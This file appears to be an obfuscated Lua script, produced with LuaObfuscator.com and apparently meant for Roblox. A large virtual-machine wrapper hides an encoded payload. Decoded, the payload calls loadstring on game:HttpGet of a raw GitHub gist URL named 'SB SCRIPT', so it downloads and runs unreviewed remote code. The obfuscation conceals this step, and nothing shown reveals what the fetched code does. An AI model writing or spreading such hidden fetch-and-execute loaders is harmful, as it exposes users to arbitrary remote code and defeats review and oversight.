--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==4) then v16=function(v24,v25,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (7==v27) then v39=function(v40,v41,v42)local v48=v40[1];local v49=v40[2];local v50=v40[3];return function(...)local v76=1;local v77= -1;local v78={...};local v79=v13("#",...) -1 ;local function v80()local v81=v48;local v82=v49;local v83=v50;local v84=v37;local v85={};local v86={};local v87={};for v97=(0 -0) -0 ,v79 do if (((3488 -(1284 + (1022 -(428 + 592))))>1201) and (v97>=v83)) then v85[v97-v83 ]=v78[v97 + 1 ];else v87[v97]=v78[v97 + ((128 -(94 + 32)) -1) ];end end local v88=(v79-v83) + (4 -3) ;local v89;local v90;while true do local v98=0 + 0 ;local v99;local v100;while true do if (((4176 -(100 + 236))>=1565) and (v98==0)) then v99=1802 -(476 + 1326) ;v100=nil;v98=73 -(6 + 35 + (1348 -(378 + 939))) ;end if ((v98==(1602 -(1204 + 397))) or ((2049 -1150)>(5861 -3292))) then while true do if (((2477 -(452 + 639))>=(999 -(29 + 156))) and (v99==(0 + 0 + 0))) then v100=0 -0 ;while true do if (((420 + 182)<=(837 + 130)) and (v100==(1769 -(1140 + 628)))) then if ((v90<=(1 + 1)) or (3187>=(10651 -6545))) then if ((v90<=(0 + 0)) or ((3676 -2050)>=((1257 + 2883) -1654))) then v87[v89[949 -(713 + 234) ]]=v42[v89[(10 -6) -1 ]];elseif ((v90>(1 + 0 + 0)) or ((5292 -(1905 -605))<((6820 -4857) + 611))) then v87[v89[2]]=v89[994 -(979 + 12) ];else local v130=0 + 0 ;local v131;local v132;while true do if ((1092<=(4045 -(878 + (291 -(82 + 151))))) and (v130==(0 + 0))) then v131=1226 -(565 + 661) ;v132=nil;v130=1 + (0 -0) ;end if (((3490 + 933)==(4207 + 216)) and ((3 -(345 -(187 + 156)))==v130)) then while true do if ((v131==0) or ((3706 + 866)<=(2060 -(502 + 77)))) then v132=v89[3 -(2 -1) ];v87[v132]=v87[v132](v14(v87,v132 + 1 ,v77));break;end end break;end end end elseif ((v90<=4) or (((466 + 984) -935)>=(2285 -(209 + 1288)))) then if ((v90>3) or ((1611 + 2274)==(3505 -(326 + (248 -(61 + 74)))))) then local v133=466 -(456 + 10) ;local v134;local v135;local v136;while true do if ((v133==(1 + 0)) or ((2850 + 1167)>4591)) then v136=nil;while true do if ((v134==((2791 -2128) -(385 + 277))) or ((10335 -6504)<(866 -(252 + 253)))) then v87[v135 + 1 + 0 ]=v136;v87[v135]=v136[v89[5 -1 ]];break;end if (((1106 -(373 + 498 + (817 -620)))==((11 + 108) -81)) and ((0 -0)==v134)) then local v155=0 + 0 ;while true do if ((2387<=(2382 + 1516)) and (1==v155)) then v134=(15 + 44) -(21 + 37) ;break;end if ((((2737 -(1259 + 222)) + (928 -(57 + 54)))>=1838) and (v155==(1797 -(600 + 202 + 995)))) then v135=v89[1015 -(71 + 942) ];v136=v87[v89[6 -3 ]];v155=(1868 -(1663 + 203)) -1 ;end end end end break;end if ((v133==(667 -(473 + 194))) or ((4965 -(266 + 84))<=3653)) then v134=0;v135=nil;v133=1;end end else local v137=0 + 0 ;local v138;local v139;local v140;local v141;local v142;local v143;while true do if ((2409==(321 + 2088)) and (1==v137)) then v140=nil;v141=nil;v137=(2 + 2) -(2 -0) ;end if (((10592 -6623)>(3096 -(166 + 1045))) and (v137==(9 -6))) then while true do if ((v138==(582 -(83 + 499))) or ((1219 + 1215)==3501)) then local v156=0 + 0 + 0 ;while true do if ((v156==(1 + 0)) or ((745 + (408 -167))>(3167 + 73 + 961))) then v138=2 -1 ;break;end if ((v156==((0 -0) -0)) or (((455 -315) + 759)>(3943 -(1579 + 385)))) then v139=0;v140=nil;v156=(2267 -(573 + 583)) -(359 + 751) ;end end end if ((v138==(3 -1)) or ((15 + 250)>=(3393 -((735 -(307 + 416)) + 793)))) then v143=nil;while true do if ((v139==(2 -0)) or ((89 + 608)<=(197 + 244))) then for v175=v140,v77 do local v176=0 -0 ;local v177;while true do if ((v176==(0 -0)) or ((38 + 576)==(213 + 3509))) then v177=0;while true do if (((2302 + 1164)==(216 + 3250)) and (v177==(0 -0))) then v143=v143 + ((4356 -3096) -(336 + 923)) ;v87[v175]=v141[v143];break;end end break;end end end break;end if (((206 + 2589)>((2614 -1205) -(348 + 298))) and (v139==(0 + (1345 -(958 + 387))))) then local v165=1131 -(214 + 917) ;local v166;while true do if ((((5129 -(560 + 59)) + (560 -204))>(326 -217)) and ((0 + 0)==v165)) then v166=(393 -(53 + 340)) -(0 + 0) ;while true do if ((v166==0) or ((1629 + 462)<(1852 -963))) then v140=v89[4 -2 ];v141,v142=v84(v87[v140](v14(v87,v140 + ((3 -2) -(1826 -(388 + 1438))) ,v89[3])));v166=1336 -((184 -90) + (6034 -4793)) ;end if ((((1 + 0) -0)==v166) or (4491<=((514 + 1110) -(261 + 122 + 61)))) then v139=1 + 0 ;break;end end break;end end end if ((v139==(1 -0)) or ((1282 -(87 + 253))==(3844 -(112 + 1112)))) then local v167=0 -0 ;local v168;while true do if ((0==v167) or ((6897 -(1750 + 232))<=(6167 -(5266 -2503)))) then v168=0 -0 ;while true do if (((8257 -5964)>(1062 -729)) and (v168==0)) then v77=(v142 + v140) -((1 + 3) -3) ;v143=0;v168=1046 -(399 + 646) ;end if ((v168==(91 -(79 + 11))) or (2891<=847)) then v139=2;break;end end break;end end end end break;end if (((4769 -3690)==(2216 -1137)) and (v138==(1 + 0 + 0))) then v141=nil;v142=nil;v138=2 + 0 ;end end break;end if (((298 + 1657 + 1936)>=(4039 -1429)) and (2==v137)) then v142=nil;v143=nil;v137=3;end if (((205 -(85 + 120))==v137) or ((4649 -(66 + 511))<(7058 -3918))) then v138=(0 -0) + 0 ;v139=nil;v137=2 -(433 -(322 + 110)) ;end end end elseif ((v90==(2 + 3)) or (((2364 + 1436) -(639 + 694))<=2119)) then do return;end else v87[v89[547 -(242 + 303) ]]();end v76=v76 + (4 -3) + 0 ;break;end if (((2277 -(297 + 1))<(762 + 1243)) and (v100==(0 -0))) then local v112=818 -(450 + 368) ;local v113;while true do if ((v112==0) or (((10476 -(1437 + 292)) -4134)<=(1076 + 1059 + 479))) then v113=0 + 0 ;while true do if (((5483 -1634)>(5429 -(833 + 960))) and (v113==0)) then local v144=0 + 0 ;while true do if ((v144==((2121 -(1376 + 121)) -(430 + 87 + 106))) or (((1163 -493) -(131 + 500))>(4155 -(118 + 191 + 86)))) then v113=620 -(236 + 383) ;break;end if ((v144==(1177 -(1027 + 150))) or ((14162 -10239)<=(106 + 94))) then v89=v81[v76];v90=v89[1 + 0 ];v144=3 -2 ;end end end if ((v113==(1 + 0)) or (411>1464)) then v100=1;break;end end break;end end end end break;end end break;end end end end A,B=v37(v12(v80));if  not A[1] then local v101=v40[4][v76] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end;return v39(v38(),{},v25)(...);end if (v27==6) then v38=nil;v38=function()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(2 -1)) then else v54=nil;v55=nil;v51=1275 -(691 + 582) ;end if (v51~=2) then else v56=nil;v57=nil;v51=2 + 1 ;end if (3==v51) then v58=nil;while true do local v102=0 + 0 ;local v103;while true do if (0==v102) then v103=1709 -(684 + 1025) ;while true do if (v103~=0) then else local v111=0;while true do if (1==v111) then v103=1;break;end if (v111==(0 + 0)) then if (0~=v52) then else v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=1 + 0 ;end if (v52==(180 -(66 + 113))) then local v115=0;local v116;while true do if (v115==0) then v116=0 -0 ;while true do if (v116~=0) then else v57=v33();v58={};v116=1;end if (v116==1) then local v147=1240 -(328 + 912) ;while true do if (v147==(0 -0)) then for v158=2 -1 ,v57 do local v159=0 -0 ;local v160;local v161;local v162;while true do if ((3 -2)~=v159) then else v162=nil;while true do if (v160==0) then local v179=0;while true do if ((420 -(248 + 172))~=v179) then else local v187=0;while true do if (v187~=(1 + 0)) then else v179=1 + 0 ;break;end if (v187==(0 -0)) then v161=v31();v162=nil;v187=1828 -(900 + 927) ;end end end if (v179==(77 -(33 + 43))) then v160=1;break;end end end if (v160==1) then if (v161==1) then v162=v31()~=(0 -0) ;elseif (v161==2) then v162=v34();elseif (v161==3) then v162=v35();end v58[v158]=v162;break;end end break;end if (v159~=(0 + 0)) then else v160=0;v161=nil;v159=1 + 0 ;end end end v56[3]=v31();v147=1 + 0 ;end if (v147==(1 + 0)) then v116=2;break;end end end if (v116==(1 + 1)) then v52=2;break;end end break;end end end v111=1;end end end if (v103~=(1200 -(229 + 970))) then else if (v52~=(7 -5)) then else local v114=0 + 0 ;while true do if (v114==1) then for v119=1823 -(1286 + 536) ,v33() do v55[v119]=v33();end return v56;end if (0==v114) then for v121=1 -0 ,v33() do local v122=0;local v123;local v124;local v125;while true do if (v122~=1) then else v125=nil;while true do if (v123==(0 -0)) then local v148=0;local v149;while true do if (v148~=(0 -0)) then else v149=0;while true do if (v149~=(430 -(41 + 388))) then else v123=1;break;end if (v149==0) then local v178=0;while true do if (v178==(1187 -(981 + 205))) then v149=1 + 0 ;break;end if (0==v178) then v124=0;v125=nil;v178=756 -(532 + 223) ;end end end end break;end end end if (v123==(1287 -(96 + 1190))) then while true do if ((0 + 0)==v124) then v125=v31();if (v30(v125,1 -0 ,4 -3 )==0) then local v169=0;local v170;local v171;local v172;local v173;local v174;while true do if (v169==0) then v170=0 -0 ;v171=nil;v169=2 -1 ;end if (v169~=(2 + 0)) then else v174=nil;while true do if (v170==(1529 -(880 + 648))) then local v182=0 -0 ;local v183;while true do if (v182==(1288 -(89 + 1199))) then v183=0;while true do if (v183==0) then local v198=0;while true do if (v198==0) then v173=nil;v174=nil;v198=601 -(96 + 504) ;end if (v198~=(1 + 0)) then else v183=137 -(129 + 7) ;break;end end end if (v183~=(253 -(90 + 162))) then else v170=2;break;end end break;end end end if (2==v170) then while true do if (v171~=2) then else local v188=0;while true do if (v188~=(1 + 0)) then else v171=3;break;end if (v188==(0 -0)) then local v199=0 -0 ;while true do if (v199==1) then v188=1;break;end if (0==v199) then if (v30(v173,1 + 0 ,1)==(1174 -(314 + 859))) then v174[77 -(39 + 36) ]=v58[v174[5 -3 ]];end if (v30(v173,2,2)~=(1 + 0)) then else v174[672 -(587 + 82) ]=v58[v174[1631 -(488 + 1140) ]];end v199=65 -(13 + 51) ;end end end end end if ((838 -(241 + 596))==v171) then local v189=218 -(159 + 59) ;local v190;local v191;while true do if (v189==0) then v190=311 -(176 + 135) ;v191=nil;v189=1 + 0 ;end if (v189==1) then while true do if ((0 -0)~=v190) then else v191=0;while true do if (0==v191) then v174={v32(),v32(),nil,nil};if (v172==(176 -(11 + 165))) then local v205=0 -0 ;local v206;local v207;local v208;while true do if (v205==(1689 -(481 + 1208))) then v206=0 + 0 ;v207=nil;v205=782 -(544 + 237) ;end if (v205~=(2 -1)) then else v208=nil;while true do if (v206==(1 -0)) then while true do if (v207==0) then v208=0 -0 ;while true do if ((1138 -(353 + 785))==v208) then v174[3]=v32();v174[4]=v32();break;end end break;end end break;end if (v206==(1598 -(786 + 812))) then local v211=0;while true do if (v211==1) then v206=1 + 0 ;break;end if (v211==(420 -(287 + 133))) then v207=0;v208=nil;v211=1269 -(322 + 946) ;end end end end break;end end elseif (v172==(1 + 0)) then v174[3 + 0 ]=v33();elseif (v172==2) then v174[3]=v33() -(2^(1780 -(615 + 1149))) ;elseif (v172~=(593 -(547 + 43))) then else local v212=0;local v213;local v214;while true do if (v212==(0 + 0)) then local v215=1617 -(1596 + 21) ;while true do if (1==v215) then v212=1;break;end if (v215~=0) then else v213=0;v214=nil;v215=1 + 0 ;end end end if (v212==(418 -(202 + 215))) then while true do if (v213==(0 -0)) then v214=0;while true do if (0==v214) then v174[3]=v33() -(2^(1043 -(173 + 854))) ;v174[4]=v32();break;end end break;end end break;end end end v191=1;end if (v191==1) then v171=2;break;end end break;end end break;end end end if (v171==(0 + 0)) then local v192=1204 -(408 + 796) ;local v193;local v194;while true do if (v192==(1994 -(349 + 1645))) then v193=0;v194=nil;v192=1 + 0 ;end if (v192==1) then while true do if (v193~=0) then else v194=0 -0 ;while true do if (v194~=(1520 -(1218 + 301))) then else v171=1;break;end if (v194~=(1464 -(948 + 516))) then else local v204=0;while true do if (v204~=1) then else v194=2 -1 ;break;end if (v204~=(0 + 0)) then else v172=v30(v125,3 -1 ,7 -4 );v173=v30(v125,988 -(138 + 846) ,841 -(422 + 413) );v204=1684 -(486 + 1197) ;end end end end break;end end break;end end end if (v171==3) then if (v30(v173,3,3)~=1) then else v174[4]=v58[v174[3 + 1 ]];end v53[v121]=v174;break;end end break;end if (v170~=(0 -0)) then else local v184=0 -0 ;while true do if (v184~=(242 -(148 + 93))) then else v170=1;break;end if ((364 -(354 + 10))==v184) then v171=0;v172=nil;v184=1;end end end end break;end if (v169~=1) then else v172=nil;v173=nil;v169=1658 -(823 + 833) ;end end end break;end end break;end end break;end if (0~=v122) then else v123=0 + 0 ;v124=nil;v122=1 + 0 ;end end end for v126=1,v33() do v54[v126-(2 -1) ]=v38();end v114=1;end end end break;end end break;end end end break;end if (v51==(0 + 0)) then v52=1651 -(1575 + 76) ;v53=nil;v51=1;end end end;v39=nil;v27=7;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (1==v27) then v30=nil;v30=function(v43,v44,v45)if v45 then local v91=0 -(0 + 0) ;local v92;while true do if (v91==0) then v92=(v43/((3 -1)^(v44-(1 -0))))%((820 -(685 + 17 + 116))^(((v45-(4 -3)) -(v44-1)) + 1 + (550 -(158 + 392)))) ;return v92-(v92%1) ;end end else local v93=1759 -(402 + 1357) ;local v94;while true do if ((1400 -(239 + 1161))==v93) then v94=(1 + 1)^(v44-(1 + 0)) ;return (((v43%(v94 + v94))>=v94) and 1) or (0 -0) ;end end end end;v31=nil;v27=2;end if (v27==0) then v28=1;v29=nil;v24=v5(v4(v24,5),"..",function(v46)if (v2(v46,2)==79) then local v95=0;while true do if (0==v95) then v29=v1(v4(v46,1,1));return "";end end else local v96=v3(v1(v46,16));if v29 then local v104=v6(v96,v29);v29=nil;return v104;else return v96;end end end);v27=1;end if (4==v27) then v34=function()local v59=v33();local v60=v33();local v61=1 + 0 ;local v62=(v30(v60,1 -0 ,71 -51 ) * (((751 -(479 + 270)) -0)^32)) + v59 ;local v63=v30(v60,39 -18 ,22 + 9 );local v64=((v30(v60,1890 -(684 + 1174) )==(743 -(493 + 249))) and  -(1981 -((1627 -(21 + 22)) + 396))) or 1 ;if (v63==(0 + 0)) then if (v62==(0 + 0)) then return v64 * ((593 + 729) -((188 -139) + 1273)) ;else v63=2 -1 ;v61=0 + 0 ;end elseif (v63==((2694 -1435) + 788)) then return ((v62==(0 -(0 + 0))) and (v64 * ((2 -1)/(0 -0)))) or (v64 * NaN) ;end return v9(v64,v63-(1710 -687) ) * (v61 + (v62/((1117 -(628 + 487))^(23 + (816 -(517 + 270)))))) ;end;v35=nil;v35=function(v47)local v65=0 + 0 ;local v66;local v67;while true do if (v65==(7 -(12 -7))) then v67={};for v105=1 + 0 , #v66 do v67[v105]=v3(v2(v4(v66,v105,v105)));end v65=956 -(199 + 754) ;end if (v65==(770 -(507 + 263))) then v66=nil;if  not v47 then v47=v33();if (v47==0) then return "";end end v65=(2 + 0) -1 ;end if (v65==(1 -0)) then v66=v4(v24,v28,(v28 + v47) -(1774 -(1241 + 532)) );v28=v28 + v47 ;v65=2;end if (v65==(1 + 2)) then return v7(v67);end end end;v27=5;end if (2==v27) then v31=function()local v68=v2(v24,v28,v28);v28=v28 + 1 ;return v68;end;v32=nil;v32=function()local v69=0 + 0 ;local v70;local v71;while true do if (v69==((1377 -(156 + 1039)) -(90 + 91))) then return (v71 * ((3190 -1986) -(883 + 36 + 29))) + v70 ;end if (v69==(0 + 0)) then v70,v71=v2(v24,v28,v28 + (1440 -(227 + 1211)) );v28=v28 + (3 -(3 -2)) ;v69=1 + 0 ;end end end;v27=3;end if (v27==3) then v33=nil;v33=function()local v72,v73,v74,v75=v2(v24,v28,v28 + (5 -2) );v28=v28 + (9 -5) ;return (v75 * 16777216) + (v74 * (58051 + 7485)) + (v73 * (128 + 128)) + v72 ;end;v34=nil;v27=4;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403843O00682O7470733A2O2F676973742E67697468756275736572636F6E74656E742E636F6D2F5A75772O792F632O38326633643630366339653136383230322O3363313632366664346332632F7261772F3764623533393534636466332O3762386538393761363238343934376238313562613338626539332F5342253235323053435249505400083O00124O00013O00122O000100023O002004000100010003001202000300044O0003000100034O00015O00022O00063O000100012O00053O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end end end
